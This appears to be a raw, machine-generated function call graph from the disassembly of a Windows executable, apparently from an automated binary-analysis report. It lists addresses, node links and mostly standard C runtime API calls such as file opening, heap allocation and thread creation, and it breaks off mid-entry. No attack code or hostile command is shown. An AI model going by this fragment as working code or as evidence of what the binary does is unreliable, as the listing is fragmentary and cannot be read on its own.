4114c8 CallUnexpected 3 API calls 17804->17806 17805 411440 GetCurrentProcess TerminateProcess 17805->17804 17807 411458 ExitProcess 17806->17807 17809 4113cd 17808->17809 17809->17783 17810 4114c8 GetModuleHandleExW 17809->17810 17811 411507 GetProcAddress 17810->17811 17812 411528 17810->17812 17811->17812 17815 41151b 17811->17815 17813 4113d9 17812->17813 17814 41152e FreeLibrary 17812->17814 17813->17783 17814->17813 17815->17812 17816->17796 17819 4112bc __FrameHandler3::FrameUnwindToState 17817->17819 17818 411323 CallUnexpected 17818->17798 17819->17818 17820 4131c9 CallUnexpected 14 API calls 17819->17820 17820->17818 17822 40e10e std::_Lockit::~_Lockit LeaveCriticalSection 17821->17822 17823 411292 17822->17823 17823->17788 17823->17801 17825 41914c CallUnexpected 6 API calls 17824->17825 17826 4114ab 17825->17826 17827 4114b0 GetPEB 17826->17827 17828 41143c 17826->17828 17827->17828 17828->17804 17828->17805 17830 41f7b5 17829->17830 17831 41f79b 17829->17831 17833 41f7d4 17830->17833 17834 41f7bd 17830->17834 17832 40e072 __Wcrtomb 14 API calls 17831->17832 17835 41f7a0 17832->17835 17837 41f7e0 17833->17837 17838 41f7f7 17833->17838 17836 40e072 __Wcrtomb 14 API calls 17834->17836 17839 40df74 ___std_exception_copy 41 API calls 17835->17839 17840 41f7c2 17836->17840 17841 40e072 __Wcrtomb 14 API calls 17837->17841 17846 41f7ab 17838->17846 17847 40fc60 17838->17847 17839->17846 17844 40df74 ___std_exception_copy 41 API calls 17840->17844 17842 41f7e5 17841->17842 17845 40df74 ___std_exception_copy 41 API calls 17842->17845 17844->17846 17845->17846 17846->17387 17848 40fc77 17847->17848 17849 40fc7e 17847->17849 17848->17846 17849->17848 17850 41513b __Getctype 41 API calls 17849->17850 17851 40fc9f 17850->17851 17855 415474 17851->17855 17856 415487 17855->17856 17857 40fcb5 17855->17857 17856->17857 17863 41dc45 17856->17863 17859 4154d2 17857->17859 17860 4154e5 17859->17860 17861 4154fa 17859->17861 17860->17861 17885 41c183 17860->17885 17861->17848 17864 41dc51 __FrameHandler3::FrameUnwindToState 17863->17864 17865 41513b __Getctype 41 API calls 17864->17865 17866 41dc5a 17865->17866 17867 41dca0 17866->17867 17876 40e0c6 EnterCriticalSection 17866->17876 17867->17857 17869 41dc78 17877 41dcc6 17869->17877 17874 40e13c CallUnexpected 41 API calls 17875 41dcc5 17874->17875 17876->17869 17878 41dc89 17877->17878 17879 41dcd4 __Getctype 17877->17879 17881 41dca5 17878->17881 17879->17878 17880 41d9f9 __Getctype 14 API calls 17879->17880 17880->17878 17884 40e10e LeaveCriticalSection 17881->17884 17883 41dc9c 17883->17867 17883->17874 17884->17883 17886 41513b __Getctype 41 API calls 17885->17886 17887 41c188 17886->17887 17890 41c09b 17887->17890 17891 41c0a7 __FrameHandler3::FrameUnwindToState 17890->17891 17892 41c0c1 17891->17892 17901 40e0c6 EnterCriticalSection 17891->17901 17894 41c0c8 17892->17894 17897 40e13c CallUnexpected 41 API calls 17892->17897 17894->17861 17895 41c0fd 17902 41c11a 17895->17902 17899 41c13a 17897->17899 17898 41c0d1 17898->17895 17900 4140f1 ___free_lconv_mon 14 API calls 17898->17900 17900->17895 17901->17898 17905 40e10e LeaveCriticalSection 17902->17905 17904 41c121 17904->17892 17905->17904 17909 41f862 __FrameHandler3::FrameUnwindToState 17906->17909 17907 41f869 17908 40e072 __Wcrtomb 14 API calls 17907->17908 17910 41f86e 17908->17910 17909->17907 17911 41f894 17909->17911 17913 40df74 ___std_exception_copy 41 API calls 17910->17913 17917 41fe1e 17911->17917 17916 41f878 17913->17916 17916->17352 17930 41b2f4 17917->17930 17921 41fe54 17924 41f8b8 17921->17924 17925 4140f1 ___free_lconv_mon 14 API calls 17921->17925 17926 41f8eb 17924->17926 17925->17924 17927 41f8f1 17926->17927 17929 41f915 17926->17929 18447 41ca68 LeaveCriticalSection 17927->18447 17929->17916 17931 40fc60 __wsopen_s 41 API calls 17930->17931 17932 41b306 17931->17932 17934 41b318 17932->17934 17985 41448f 17932->17985 17935 410964 17934->17935 17991 4107f0 17935->17991 17938 41feaf 18039 41fbfa 17938->18039 17941 41fee1 17943 40e05f __dosmaperr 14 API calls 17941->17943 17942 41fefa 18057 41ca8b 17942->18057 17946 41fee6 17943->17946 17951 40e072 __Wcrtomb 14 API calls 17946->17951 17947 41ff08 17949 40e05f __dosmaperr 14 API calls 17947->17949 17948 41ff1f 18070 41fb65 CreateFileW 17948->18070 17952 41ff0d 17949->17952 17953 41fef3 17951->17953 17954 40e072 __Wcrtomb 14 API calls 17952->17954 17953->17921 17954->17946 17955 41ffd5 GetFileType 17956 41ffe0 GetLastError 17955->17956 17957 420027 17955->17957 17959 40e018 __dosmaperr 14 API calls 17956->17959 18072 41c9d6 17957->18072 17958 41ffaa GetLastError 17961 40e018 __dosmaperr 14 API calls 17958->17961 17962 41ffee CloseHandle 17959->17962 17960 41ff58 17960->17955 17960->17958 18071 41fb65 CreateFileW 17960->18071 17961->17946 17962->17946 17964 420017 17962->17964 17967 40e072 __Wcrtomb 14 API calls 17964->17967 17966 41ff9d 17966->17955 17966->17958 17969 42001c 17967->17969 17969->17946 17970 420094 17974 42009b 17970->17974 18102 41f917 17970->18102 18096 414d2d 17974->18096 17975 4200d7 17975->17953 17977 420153 CloseHandle 17975->17977 18129 41fb65 CreateFileW 17977->18129 17979 42017e 17980 4201b4 17979->17980 17981 420188 GetLastError 17979->17981 17980->17953 17982 40e018 __dosmaperr 14 API calls 17981->17982 17983 420194 17982->17983 18130 41cb9e 17983->18130 17988 4141e3 17985->17988 17989 4143cc std::_Lockit::_Lockit 5 API calls 17988->17989 17990 4141f9 17989->17990 17990->17934 17992 410818 17991->17992 17993 4107fe 17991->17993 17995 41081f 17992->17995 17996 41083e 17992->17996 18009 4109a5 17993->18009 17997 410808 17995->17997 18013 4109e6 17995->18013 18018 41b00f 17996->18018 17997->17921 17997->17938 18000 41084d 18001 410854 GetLastError 18000->18001 18003 4109e6 __wsopen_s 15 API calls 18000->18003 18006 41087a 18000->18006 18021 40e018 18001->18021 18003->18006 18004 41b00f __wsopen_s MultiByteToWideChar 18007 410891 18004->18007 18006->17997 18006->18004 18007->17997 18007->18001 18008 40e072 __Wcrtomb 14 API calls 18008->17997 18010 4109b0 18009->18010 18011 4109b8 18009->18011 18012 4140f1 ___free_lconv_mon 14 API calls 18010->18012 18011->17997 18012->18011 18014 4109a5 __wsopen_s 14 API calls 18013->18014 18015 4109f4 18014->18015 18026 410a25 18015->18026 18019 41b020 MultiByteToWideChar 18018->18019 18019->18000 18036 40e05f 18021->18036 18023 40e023 __dosmaperr 18024 40e072 __Wcrtomb 14 API calls 18023->18024 18025 40e036 18024->18025 18025->18008 18029 415426 18026->18029 18030 415464 18029->18030 18034 415434 __dosmaperr 18029->18034 18031 40e072 __Wcrtomb 14 API calls 18030->18031 18033 410a05 18031->18033 18032 41544f HeapAlloc 18032->18033 18032->18034 18033->17997 18034->18030 18034->18032 18035 412e98 std::_Facet_Register 2 API calls 18034->18035 18035->18034 18037 41528c __dosmaperr 14 API calls 18036->18037 18038 40e064 18037->18038 18038->18023 18040 41fc35 18039->18040 18041 41fc1b 18039->18041 18139 41fb8a 18040->18139 18041->18040 18043 40e072 __Wcrtomb 14 API calls 18041->18043 18044 41fc2a 18043->18044 18045 40df74 ___std_exception_copy 41 API calls 18044->18045 18045->18040 18046 41fc6d 18047 41fc9c 18046->18047 18050 40e072 __Wcrtomb 14 API calls 18046->18050 18048 41fcef 18047->18048 18146 4115c9 18047->18146 18048->17941 18048->17942 18052 41fc91 18050->18052 18051 41fcea 18051->18048 18053 41fd67 18051->18053 18054 40df74 ___std_exception_copy 41 API calls 18052->18054 18055 40dfa1 __Getctype 11 API calls 18053->18055 18054->18047 18056 41fd73 18055->18056 18058 41ca97 __FrameHandler3::FrameUnwindToState 18057->18058 18153 40e0c6 EnterCriticalSection 18058->18153 18060 41ca9e 18061 41cac3 18060->18061 18066 41cb32 EnterCriticalSection 18060->18066 18067 41cae5 18060->18067 18157 41c865 18061->18157 18066->18067 18068 41cb3f LeaveCriticalSection 18066->18068 18154 41cb95 18067->18154 18068->18060 18070->17960 18071->17966 18073 41c9e5 18072->18073 18074 41ca4e 18072->18074 18073->18074 18080 41ca0b __wsopen_s 18073->18080 18075 40e072 __Wcrtomb 14 API calls 18074->18075 18076 41ca53 18075->18076 18077 40e05f __dosmaperr 14 API calls 18076->18077 18078 41ca3b 18077->18078 18078->17970 18081 41fd74 18078->18081 18079 41ca35 SetStdHandle 18079->18078 18080->18078 18080->18079 18082 41fdce 18081->18082 18083 41fd9c 18081->18083 18082->17970 18083->18082 18171 418ab3 18083->18171 18097 414d40 _Fputc 18096->18097 18412 414d5d 18097->18412 18099 414d4c 18103 41fa2b 18102->18103 18104 41f948 18102->18104 18103->17974 18103->17975 18105 4115c9 __wsopen_s 41 API calls 18104->18105 18112 41f968 18104->18112 18106 41f95f 18105->18106 18107 41fb5a 18106->18107 18106->18112 18108 40dfa1 __Getctype 11 API calls 18107->18108 18109 41fb64 18108->18109 18110 41fa51 18110->18103 18111 422232 __wsopen_s 53 API calls 18110->18111 18114 41fa5b 18110->18114 18117 41fa83 18111->18117 18112->18103 18112->18110 18113 418ab3 __wsopen_s 43 API calls 18112->18113 18116 41fa22 18112->18116 18115 41fa3b 18113->18115 18114->18103 18123 40e072 __Wcrtomb 14 API calls 18114->18123 18115->18116 18121 41fa46 18115->18121 18116->18103 18116->18114 18425 416c70 18116->18425 18117->18103 18117->18114 18118 41faee 18117->18118 18119 41fac8 18117->18119 18120 41fabb 18117->18120 18124 418ab3 __wsopen_s 43 API calls 18118->18124 18119->18118 18127 41fad0 18119->18127 18125 40e072 __Wcrtomb 14 API calls 18120->18125 18126 418ab3 __wsopen_s 43 API calls 18121->18126 18123->18103 18124->18114 18125->18114 18126->18110 18128 418ab3 __wsopen_s 43 API calls 18127->18128 18128->18114 18129->17979 18142 41fba2 18139->18142 18140 41fbbd 18140->18046 18141 40e072 __Wcrtomb 14 API calls 18143 41fbe1 18141->18143 18142->18140 18142->18141 18144 40df74 ___std_exception_copy 41 API calls 18143->18144 18145 41fbec 18144->18145 18145->18046 18147 4115d5 18146->18147 18148 4115ea 18146->18148 18149 40e072 __Wcrtomb 14 API calls 18147->18149 18148->18051 18150 4115da 18149->18150 18151 40df74 ___std_exception_copy 41 API calls 18150->18151 18152 4115e5 18151->18152 18152->18051 18153->18060 18165 40e10e LeaveCriticalSection 18154->18165 18156 41cb05 18156->17947 18156->17948 18158 414094 __dosmaperr 14 API calls 18157->18158 18160 41c877 18158->18160 18159 41c884 18161 4140f1 ___free_lconv_mon 14 API calls 18159->18161 18160->18159 18166 4146d9 18160->18166 18163 41c8d9 18161->18163 18163->18067 18164 41c9b3 EnterCriticalSection 18163->18164 18164->18067 18165->18156 18167 4143cc std::_Lockit::_Lockit 5 API calls 18166->18167 18168 4146f5 18167->18168 18169 414713 InitializeCriticalSectionAndSpinCount 18168->18169 18170 4146fe 18168->18170 18169->18170 18170->18160 18172 418ac7 _Fputc 18171->18172 18246 4189d2 18172->18246 18174 418adc 18252 41cc2f 18246->18252 18248 4189e4 18249 418a00 SetFilePointerEx 18248->18249 18251 4189ec __wsopen_s 18248->18251 18250 418a18 GetLastError 18249->18250 18249->18251 18250->18251 18251->18174 18253 41cc51 18252->18253 18254 41cc3c 18252->18254 18257 40e05f __dosmaperr 14 API calls 18253->18257 18259 41cc76 18253->18259 18255 40e05f __dosmaperr 14 API calls 18254->18255 18256 41cc41 18255->18256 18258 40e072 __Wcrtomb 14 API calls 18256->18258 18260 41cc81 18257->18260 18261 41cc49 18258->18261 18259->18248 18262 40e072 __Wcrtomb 14 API calls 18260->18262 18261->18248 18263 41cc89 18262->18263 18413 41cc2f __wsopen_s 41 API calls 18412->18413 18416 414d6d 18413->18416 18414 414d73 18417 41cb9e __wsopen_s 15 API calls 18414->18417 18415 414da5 18415->18414 18419 41cc2f __wsopen_s 41 API calls 18415->18419 18416->18414 18416->18415 18418 41cc2f __wsopen_s 41 API calls 18416->18418 18424 414dcb __wsopen_s 18417->18424 18420 414d9c 18418->18420 18421 414db1 FindCloseChangeNotification 18419->18421 18422 41cc2f __wsopen_s 41 API calls 18420->18422 18421->18414 18423 414dbd GetLastError 18421->18423 18422->18415 18423->18414 18424->18099 18426 416c83 _Fputc 18425->18426 18431 416ca7 18426->18431 18429 40bbd5 _Fputc 41 API calls 18432 416cb3 __FrameHandler3::FrameUnwindToState 18431->18432 18433 416d77 18432->18433 18435 416c95 18432->18435 18436 416d08 18432->18436 18434 40def7 _Fputc 41 API calls 18433->18434 18434->18435 18435->18429 18442 41c9b3 EnterCriticalSection 18436->18442 18447->17929 22426 4067f8 22427 406801 22426->22427 22428 406836 22426->22428 22427->22428 22431 40edff 22427->22431 22430 406829 22432 40ee11 22431->22432 22436 40ee1a ___scrt_uninitialize_crt 22431->22436 22433 40ec83 ___scrt_uninitialize_crt 70 API calls 22432->22433 22434 40ee17 22433->22434 22434->22430 22435 40ee2b 22435->22430 22436->22435 22439 40ec23 22436->22439 22440 40ec2f __FrameHandler3::FrameUnwindToState 22439->22440 22447 40bb65 EnterCriticalSection 22440->22447 22442 40ec3d 22443 40ed91 ___scrt_uninitialize_crt 70 API calls 22442->22443 22444 40ec4e 22443->22444 22448 40ec77 22444->22448 22447->22442 22451 40bb79 LeaveCriticalSection 22448->22451 22450 40ec60 22450->22430 22451->22450 18448 407294 18449 4072a0 __FrameHandler3::FrameUnwindToState 18448->18449 18474 407505 18449->18474 18451 4072a7 18452 407400 18451->18452 18462 4072d1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 18451->18462 18508 407b01 IsProcessorFeaturePresent 18452->18508 18454 407407 18489 4115b3 18454->18489 18457 411577 CallUnexpected 23 API calls 18458 407415 18457->18458 18459 4072f0 18460 407371 18482 4111f1 18460->18482 18462->18459 18462->18460 18492 41158d 18462->18492 18464 407377 18486 403ee0 CreateThread WaitForSingleObject 18464->18486 18469 40739c 18470 4073a5 18469->18470 18499 411568 18469->18499 18502 407676 18470->18502 18475 40750e 18474->18475 18512 4077e0 IsProcessorFeaturePresent 18475->18512 18479 40751f 18481 407523 18479->18481 18522 40a5ad 18479->18522 18481->18451 18483 4111ff 18482->18483 18484 4111fa 18482->18484 18483->18464 18582 410f4b 18484->18582 18487 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18486->18487 18850 4038c0 18486->18850 18488 403f22 18487->18488 18497 407c21 GetModuleHandleW 18488->18497 18490 41139b CallUnexpected 23 API calls 18489->18490 18491 40740d 18490->18491 18491->18457 18493 4115a3 std::_Lockit::_Lockit 18492->18493 18496 4107b4 __FrameHandler3::FrameUnwindToState 18492->18496 18493->18460 18494 41513b __Getctype 41 API calls 18494->18496 18495 40e13c CallUnexpected 41 API calls 18495->18496 18496->18492 18496->18494 18496->18495 18498 407398 18497->18498 18498->18454 18498->18469 18500 41139b CallUnexpected 23 API calls 18499->18500 18501 411573 18500->18501 18501->18470 18503 407682 18502->18503 18504 4073ae 18503->18504 19892 413370 18503->19892 18504->18459 18506 407690 18507 40a5ad ___scrt_uninitialize_crt 7 API calls 18506->18507 18507->18504 18509 407b17 CallUnexpected codecvt 18508->18509 18510 407bc2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18509->18510 18511 407c0d CallUnexpected 18510->18511 18511->18454 18513 40751a 18512->18513 18514 40a58e 18513->18514 18528 40b667 18514->18528 18516 40a597 18516->18479 18519 40a59f 18520 40a5aa 18519->18520 18542 40b6a3 18519->18542 18520->18479 18523 40a5c0 18522->18523 18524 40a5b6 18522->18524 18523->18481 18525 40a726 ___vcrt_uninitialize_ptd 6 API calls 18524->18525 18526 40a5bb 18525->18526 18527 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18526->18527 18527->18523 18529 40b670 18528->18529 18531 40b699 18529->18531 18533 40a593 18529->18533 18546 40b8ac 18529->18546 18532 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18531->18532 18532->18533 18533->18516 18534 40a6f3 18533->18534 18563 40b7bd 18534->18563 18538 40a723 18538->18519 18541 40a708 18541->18519 18543 40b6cd 18542->18543 18544 40b6ae 18542->18544 18543->18516 18545 40b6b8 DeleteCriticalSection 18544->18545 18545->18543 18545->18545 18551 40b6d2 18546->18551 18549 40b8e4 InitializeCriticalSectionAndSpinCount 18550 40b8cf 18549->18550 18550->18529 18552 40b6ef 18551->18552 18555 40b6f3 18551->18555 18552->18549 18552->18550 18553 40b75b GetProcAddress 18553->18552 18555->18552 18555->18553 18556 40b74c 18555->18556 18558 40b772 LoadLibraryExW 18555->18558 18556->18553 18557 40b754 FreeLibrary 18556->18557 18557->18553 18559 40b789 GetLastError 18558->18559 18560 40b7b9 18558->18560 18559->18560 18561 40b794 ___vcrt_FlsGetValue 18559->18561 18560->18555 18561->18560 18562 40b7aa LoadLibraryExW 18561->18562 18562->18555 18564 40b6d2 ___vcrt_FlsGetValue 5 API calls 18563->18564 18565 40b7d7 18564->18565 18566 40b7f0 TlsAlloc 18565->18566 18567 40a6fd 18565->18567 18567->18541 18568 40b86e 18567->18568 18569 40b6d2 ___vcrt_FlsGetValue 5 API calls 18568->18569 18570 40b888 18569->18570 18571 40b8a3 TlsSetValue 18570->18571 18572 40a716 18570->18572 18571->18572 18572->18538 18573 40a726 18572->18573 18574 40a730 18573->18574 18576 40a736 18573->18576 18577 40b7f8 18574->18577 18576->18541 18578 40b6d2 ___vcrt_FlsGetValue 5 API calls 18577->18578 18579 40b812 18578->18579 18580 40b82a TlsFree 18579->18580 18581 40b81e 18579->18581 18580->18581 18581->18576 18583 410f54 18582->18583 18586 410f6a 18582->18586 18583->18586 18588 410f77 18583->18588 18585 410f61 18585->18586 18605 4110e2 18585->18605 18586->18483 18589 410f80 18588->18589 18590 410f83 18588->18590 18589->18585 18613 41c13b 18590->18613 18595 410fa0 18641 410fd1 18595->18641 18596 410f94 18597 4140f1 ___free_lconv_mon 14 API calls 18596->18597 18599 410f9a 18597->18599 18599->18585 18601 4140f1 ___free_lconv_mon 14 API calls 18602 410fc4 18601->18602 18603 4140f1 ___free_lconv_mon 14 API calls 18602->18603 18604 410fca 18603->18604 18604->18585 18606 411153 18605->18606 18607 4110f1 18605->18607 18606->18586 18607->18606 18608 414094 __dosmaperr 14 API calls 18607->18608 18610 41b08b WideCharToMultiByte _Fputc 18607->18610 18611 411157 18607->18611 18612 4140f1 ___free_lconv_mon 14 API calls 18607->18612 18608->18607 18609 4140f1 ___free_lconv_mon 14 API calls 18609->18606 18610->18607 18611->18609 18612->18607 18614 410f89 18613->18614 18615 41c144 18613->18615 18619 41c43d GetEnvironmentStringsW 18614->18619 18663 4151f6 18615->18663 18620 41c455 18619->18620 18625 410f8e 18619->18625 18621 41b08b _Fputc WideCharToMultiByte 18620->18621 18622 41c472 18621->18622 18623 41c487 18622->18623 18624 41c47c FreeEnvironmentStringsW 18622->18624 18626 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18623->18626 18624->18625 18625->18595 18625->18596 18627 41c48e 18626->18627 18628 41c4a7 18627->18628 18629 41c496 18627->18629 18631 41b08b _Fputc WideCharToMultiByte 18628->18631 18630 4140f1 ___free_lconv_mon 14 API calls 18629->18630 18632 41c49b FreeEnvironmentStringsW 18630->18632 18633 41c4b7 18631->18633 18634 41c4d8 18632->18634 18635 41c4c6 18633->18635 18636 41c4be 18633->18636 18634->18625 18638 4140f1 ___free_lconv_mon 14 API calls 18635->18638 18637 4140f1 ___free_lconv_mon 14 API calls 18636->18637 18639 41c4c4 FreeEnvironmentStringsW 18637->18639 18638->18639 18639->18634 18642 410fe6 18641->18642 18643 414094 __dosmaperr 14 API calls 18642->18643 18644 41100d 18643->18644 18645 411015 18644->18645 18655 41101f 18644->18655 18646 4140f1 ___free_lconv_mon 14 API calls 18645->18646 18647 410fa7 18646->18647 18647->18601 18648 41107c 18649 4140f1 ___free_lconv_mon 14 API calls 18648->18649 18649->18647 18650 414094 __dosmaperr 14 API calls 18650->18655 18651 41108b 18844 4110b3 18651->18844 18655->18648 18655->18650 18655->18651 18657 4110a6 18655->18657 18659 4140f1 ___free_lconv_mon 14 API calls 18655->18659 18835 4133ff 18655->18835 18656 4140f1 ___free_lconv_mon 14 API calls 18658 411098 18656->18658 18660 40dfa1 __Getctype 11 API calls 18657->18660 18662 4140f1 ___free_lconv_mon 14 API calls 18658->18662 18659->18655 18661 4110b2 18660->18661 18662->18647 18664 415201 18663->18664 18665 415207 18663->18665 18667 4145dd __dosmaperr 6 API calls 18664->18667 18666 41461c __dosmaperr 6 API calls 18665->18666 18685 41520d 18665->18685 18668 415221 18666->18668 18667->18665 18669 414094 __dosmaperr 14 API calls 18668->18669 18668->18685 18671 415231 18669->18671 18670 40e13c CallUnexpected 41 API calls 18672 41528b 18670->18672 18673 415239 18671->18673 18674 41524e 18671->18674 18676 41461c __dosmaperr 6 API calls 18673->18676 18675 41461c __dosmaperr 6 API calls 18674->18675 18677 41525a 18675->18677 18680 415245 18676->18680 18678 41526d 18677->18678 18679 41525e 18677->18679 18682 414f69 __dosmaperr 14 API calls 18678->18682 18681 41461c __dosmaperr 6 API calls 18679->18681 18683 4140f1 ___free_lconv_mon 14 API calls 18680->18683 18681->18680 18684 415278 18682->18684 18683->18685 18686 4140f1 ___free_lconv_mon 14 API calls 18684->18686 18685->18670 18687 415212 18685->18687 18686->18687 18688 41bf46 18687->18688 18689 41c09b __wsopen_s 41 API calls 18688->18689 18690 41bf70 18689->18690 18711 41bcc6 18690->18711 18693 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18694 41bf9a 18693->18694 18695 41bfb0 18694->18695 18696 41bfa2 18694->18696 18718 41c196 18695->18718 18697 4140f1 ___free_lconv_mon 14 API calls 18696->18697 18699 41bf89 18697->18699 18699->18614 18701 41bfe8 18702 40e072 __Wcrtomb 14 API calls 18701->18702 18703 41bfed 18702->18703 18707 4140f1 ___free_lconv_mon 14 API calls 18703->18707 18704 41c02f 18706 41c078 18704->18706 18729 41bbb8 18704->18729 18705 41c003 18705->18704 18708 4140f1 ___free_lconv_mon 14 API calls 18705->18708 18710 4140f1 ___free_lconv_mon 14 API calls 18706->18710 18707->18699 18708->18704 18710->18699 18712 40fc60 __wsopen_s 41 API calls 18711->18712 18713 41bcd8 18712->18713 18714 41bce7 GetOEMCP 18713->18714 18715 41bcf9 18713->18715 18716 41bd10 18714->18716 18715->18716 18717 41bcfe GetACP 18715->18717 18716->18693 18716->18699 18717->18716 18719 41bcc6 43 API calls 18718->18719 18721 41c1b6 18719->18721 18720 41c22f codecvt 18723 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18720->18723 18721->18720 18722 41c1f3 IsValidCodePage 18721->18722 18722->18720 18724 41c205 18722->18724 18725 41bfdd 18723->18725 18726 41c234 GetCPInfo 18724->18726 18728 41c20e codecvt 18724->18728 18725->18701 18725->18705 18726->18720 18726->18728 18737 41bd9a 18728->18737 18730 41bbc4 __FrameHandler3::FrameUnwindToState 18729->18730 18809 40e0c6 EnterCriticalSection 18730->18809 18732 41bbce 18810 41bc05 18732->18810 18738 41bdc2 GetCPInfo 18737->18738 18739 41be8b 18737->18739 18738->18739 18740 41bdda 18738->18740 18742 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18739->18742 18748 418da8 18740->18748 18744 41bf44 18742->18744 18744->18720 18749 40fc60 __wsopen_s 41 API calls 18748->18749 18750 418dc8 18749->18750 18751 41b00f __wsopen_s MultiByteToWideChar 18750->18751 18755 418df5 18751->18755 18752 418e8c 18754 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18752->18754 18753 418e84 18768 40716c 18753->18768 18758 418eaf 18754->18758 18755->18752 18755->18753 18757 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 18755->18757 18759 418e1a __alloca_probe_16 codecvt 18755->18759 18757->18759 18763 41909f 18758->18763 18759->18753 18760 41b00f __wsopen_s MultiByteToWideChar 18759->18760 18761 418e65 18760->18761 18761->18753 18762 418e70 GetStringTypeW 18761->18762 18762->18753 18764 40fc60 __wsopen_s 41 API calls 18763->18764 18769 407176 18768->18769 18770 407187 18768->18770 18769->18770 18772 40dd34 18769->18772 18770->18752 18773 4140f1 ___free_lconv_mon 14 API calls 18772->18773 18809->18732 18820 410178 18810->18820 18812 41bc27 18813 410178 41 API calls 18812->18813 18814 41bc46 18813->18814 18821 410189 18820->18821 18829 410185 _Yarn 18820->18829 18822 410190 18821->18822 18823 4101a3 codecvt 18821->18823 18824 40e072 __Wcrtomb 14 API calls 18822->18824 18827 4101d1 18823->18827 18828 4101da 18823->18828 18823->18829 18825 410195 18824->18825 18826 40df74 ___std_exception_copy 41 API calls 18825->18826 18826->18829 18830 40e072 __Wcrtomb 14 API calls 18827->18830 18828->18829 18832 40e072 __Wcrtomb 14 API calls 18828->18832 18829->18812 18831 4101d6 18830->18831 18832->18831 18836 41340d 18835->18836 18837 41341b 18835->18837 18836->18837 18842 413433 18836->18842 18838 40e072 __Wcrtomb 14 API calls 18837->18838 18839 413423 18838->18839 18840 40df74 ___std_exception_copy 41 API calls 18839->18840 18841 41342d 18840->18841 18841->18655 18842->18841 18843 40e072 __Wcrtomb 14 API calls 18842->18843 18843->18839 18845 4110c0 18844->18845 18846 411091 18844->18846 18847 4110d7 18845->18847 18849 4140f1 ___free_lconv_mon 14 API calls 18845->18849 18846->18656 18848 4140f1 ___free_lconv_mon 14 API calls 18847->18848 18848->18846 18849->18845 18889 40742e 18850->18889 18852 4038e3 std::ios_base::_Ios_base_dtor 18853 403902 LoadLibraryW 18852->18853 18899 402320 18853->18899 18890 407433 18889->18890 18892 40744d 18890->18892 18893 412e98 std::_Facet_Register 2 API calls 18890->18893 18895 40744f std::_Facet_Register 18890->18895 18985 40e180 18890->18985 18892->18852 18893->18890 18894 407f8e std::_Facet_Register 18896 408090 CallUnexpected RaiseException 18894->18896 18895->18894 18994 408090 18895->18994 18898 407fab 18896->18898 18902 402368 std::ios_base::_Ios_base_dtor 18899->18902 18906 4036c0 std::ios_base::_Ios_base_dtor 18899->18906 18900 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18901 403723 18900->18901 18910 401fd0 18901->18910 18903 404390 std::ios_base::_Init 43 API calls 18902->18903 18905 4036c2 18902->18905 18902->18906 18907 403727 18902->18907 18997 401110 18902->18997 18903->18902 18905->18906 18905->18907 18906->18900 19001 40df84 18907->19001 19228 403fc0 18910->19228 18986 415426 18985->18986 18987 415464 18986->18987 18989 41544f HeapAlloc 18986->18989 18992 415438 __dosmaperr 18986->18992 18988 40e072 __Wcrtomb 14 API calls 18987->18988 18991 415469 18988->18991 18990 415462 18989->18990 18989->18992 18990->18991 18991->18890 18992->18987 18992->18989 18993 412e98 std::_Facet_Register 2 API calls 18992->18993 18993->18992 18995 4080d7 RaiseException 18994->18995 18996 4080aa 18994->18996 18995->18894 18996->18995 18998 401122 18997->18998 19006 40d98e 18998->19006 19002 40dec0 ___std_exception_copy 41 API calls 19001->19002 19003 40df93 19002->19003 19004 40dfa1 __Getctype 11 API calls 19003->19004 19005 40dfa0 19004->19005 19007 40d9a2 _Fputc 19006->19007 19008 40d9c4 19007->19008 19010 40d9eb 19007->19010 19009 40def7 _Fputc 41 API calls 19008->19009 19012 40d9df 19009->19012 19015 40bdc9 19010->19015 19013 40bbd5 _Fputc 41 API calls 19012->19013 19014 40113c 19013->19014 19014->18902 19016 40bdd5 __FrameHandler3::FrameUnwindToState 19015->19016 19023 40bb65 EnterCriticalSection 19016->19023 19018 40bde3 19024 40c97a 19018->19024 19023->19018 19038 4163d8 19024->19038 19026 40c9a1 19047 40cb85 19026->19047 19033 407420 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19034 40bdf0 19033->19034 19069 41639d 19038->19069 19040 4163e9 19041 416462 19040->19041 19042 416439 19040->19042 19041->19026 19043 415426 std::_Locinfo::_Locinfo_ctor 15 API calls 19042->19043 19044 416443 19043->19044 19045 4140f1 ___free_lconv_mon 14 API calls 19044->19045 19046 41644c 19045->19046 19046->19041 19082 40d7a6 19047->19082 19050 40cbae 19051 40def7 _Fputc 41 API calls 19050->19051 19052 40c9e8 19051->19052 19062 40c93c 19052->19062 19055 40d730 _Fputc 41 API calls 19057 40cbd9 std::_Locinfo::_Locinfo_ctor 19055->19057 19057->19052 19057->19055 19058 40cdb6 19057->19058 19088 40cb0d 19057->19088 19091 40ce31 19057->19091 19125 40cf8f 19057->19125 19059 40def7 _Fputc 41 API calls 19058->19059 19060 40cdd2 19059->19060 19061 40def7 _Fputc 41 API calls 19060->19061 19061->19052 19063 4140f1 ___free_lconv_mon 14 API calls 19062->19063 19064 40c94c 19063->19064 19065 416484 19064->19065 19066 40ca02 19065->19066 19067 41648f 19065->19067 19066->19033 19067->19066 19221 40ed28 19067->19221 19071 4163a9 19069->19071 19070 4163ca 19070->19040 19071->19070 19075 414bd2 19071->19075 19073 4163c4 19074 421bd0 __wsopen_s 41 API calls 19073->19074 19074->19070 19076 414bf3 19075->19076 19077 414bde 19075->19077 19076->19073 19078 40e072 __Wcrtomb 14 API calls 19077->19078 19079 414be3 19078->19079 19080 40df74 ___std_exception_copy 41 API calls 19079->19080 19081 414bee 19080->19081 19081->19073 19083 40d7b1 19082->19083 19084 